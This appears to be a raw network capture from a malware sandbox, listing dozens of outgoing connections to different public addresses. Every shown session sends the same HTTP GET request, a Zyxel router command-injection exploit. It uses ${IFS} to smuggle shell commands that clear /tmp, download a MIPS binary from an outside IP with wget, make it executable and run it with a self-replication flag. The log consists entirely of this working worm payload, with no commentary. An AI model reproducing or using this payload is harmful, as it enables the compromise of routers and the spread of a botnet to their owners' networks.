                                            Jan 14, 2024 15:50:48.610677958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6775192.168.2.236072686.29.70.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610698938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6776192.168.2.2336716217.103.75.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610735893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6777192.168.2.2346860198.203.182.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610769987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6778192.168.2.2334958128.142.207.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610780954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6779192.168.2.234697068.149.151.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610806942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6780192.168.2.234799837.114.102.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610837936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6781192.168.2.234715874.222.220.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610856056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6782192.168.2.235277032.6.172.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610868931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6783192.168.2.233361879.0.65.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610891104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6784192.168.2.235944866.99.128.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610923052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6785192.168.2.233947298.124.162.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.610975027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6786192.168.2.2360638150.39.240.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611018896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6787192.168.2.235794832.127.108.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611047983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6788192.168.2.2336576210.107.94.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611078024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6789192.168.2.2357166182.143.123.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611104965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6790192.168.2.2359252198.165.66.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611129999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6791192.168.2.235868631.21.145.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611159086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6792192.168.2.2351928178.90.51.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611176968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6793192.168.2.235568687.98.126.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611200094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6794192.168.2.2336714166.237.184.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611228943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6795192.168.2.2358454212.209.22.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611690044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6796192.168.2.2352978173.30.104.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611697912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6797192.168.2.233483876.240.27.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611735106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6798192.168.2.234294687.169.53.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611742973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6799192.168.2.2359824190.49.0.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611809969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6800192.168.2.235907032.229.144.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611826897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6801192.168.2.2355924161.116.193.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611860037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6802192.168.2.235436852.123.39.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611872911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6803192.168.2.2336172146.70.16.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611901999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6804192.168.2.2334252173.224.149.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611922026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6805192.168.2.234633614.67.202.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611958981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6806192.168.2.235104045.84.84.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.611979961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6807192.168.2.233432887.255.131.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612011909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6808192.168.2.2341592126.93.224.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612046003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6809192.168.2.2343320206.46.220.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612067938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6810192.168.2.234417249.96.238.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612109900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6811192.168.2.2351410170.46.206.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612133026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6812192.168.2.234205486.170.47.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612143040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6813192.168.2.2345262118.195.105.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612199068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6814192.168.2.233436685.21.75.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612225056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6815192.168.2.23412324.225.227.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612245083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6816192.168.2.2340220107.134.134.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612274885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6817192.168.2.235377063.145.54.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612302065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6818192.168.2.23358865.99.165.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612359047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6819192.168.2.2352966106.189.204.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612394094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6820192.168.2.2339278142.214.213.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612418890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6821192.168.2.236081661.129.58.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612441063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6822192.168.2.234588871.166.153.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612484932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6823192.168.2.235783214.155.66.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612507105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6824192.168.2.2359850187.219.76.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612535000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6825192.168.2.2360946173.44.233.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612586975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6826192.168.2.235177035.163.136.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612588882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6827192.168.2.2343114186.93.104.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612622976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6828192.168.2.2359696131.156.238.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612656116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6829192.168.2.2337146210.195.196.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612698078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6830192.168.2.234820272.98.142.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612718105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6831192.168.2.2351680202.87.227.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612749100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6832192.168.2.233283089.180.157.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612793922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6833192.168.2.2343328120.209.52.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612824917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6834192.168.2.2339196103.59.102.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612859011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6835192.168.2.2334666108.9.56.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612880945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6836192.168.2.2334568153.143.56.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.612900972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6837192.168.2.23558989.68.77.155443
                                            TimestampBytes transferredDirectionData
